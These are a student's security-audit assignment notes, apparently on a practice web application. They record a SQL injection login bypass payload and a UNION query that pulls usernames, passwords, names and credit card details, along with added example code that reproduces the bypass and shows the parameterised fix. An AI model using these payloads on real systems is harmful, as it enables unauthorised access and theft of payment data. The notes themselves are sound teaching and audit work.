quartz/content/notes/ass01-security-audit.md
2022-09-08 10:23:15 +12:00


title: ass01-security-audit
aliases: assignment
tags: comp210

Jet Hughes - 9474308

Summary of system

  • function
  • technology

Flaws

Password policy

  • must have at least 5 characters and one digit.
    • not sufficient

SQL Injection

  • can log in to admin using username: " 'or 1=1;--"
  • we are able to extract data, which is displayed as the user's username
  • we can extract the data from the database using this "username"
    • ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;--

(query output: one row per user with username, password hash, name, card number, expiry and CVV; the dump is omitted)

Passwords: (the list of extracted password hashes is omitted)
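The login bypass recorded above, reproduced against a constructed in-memory SQLite table next to the parameterised fix. This is an added example, not code from the audited system; the table rows, the SHA-256 password hashing and the function names are assumptions.

```python
import hashlib
import sqlite3

# Username payload recorded in the audit notes (login bypass).
BYPASS_PAYLOAD = "' or 1=1;--"


def _h(password: str) -> str:
    """Illustrative password hashing for the sample rows (assumption)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample table using the column names from the audit's
    UNION payload; the rows are made up, not the real system's data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (username TEXT, password TEXT, name TEXT, "
                "credit_card_number TEXT)")
    rows = [("admin", _h("correct horse"), "Site Admin", "0000 0000 0000 0000"),
            ("alice", _h("alice1"), "Alice Example", "1111 1111 1111 1111")]
    con.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", rows)
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """Flawed pattern: input is spliced into the SQL text. The payload's quote
    closes the literal, 'or 1=1' makes WHERE true for every row, and '--'
    comments out the password check, so the first row (admin) is returned."""
    sql = (f"SELECT username FROM user WHERE username = '{username}' "
           f"AND password = '{_h(password)}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Fix: bound parameters. The payload stays a plain string value that is
    compared against the username column, so it matches nothing."""
    row = con.execute(
        "SELECT username FROM user WHERE username = ? AND password = ?",
        (username, _h(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_PAYLOAD, "x"))  # admin
    print("fixed:     ", login_safe(db, BYPASS_PAYLOAD, "x"))        # None
```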

JavaScript Injection

Path traversal

Network-Level security

Other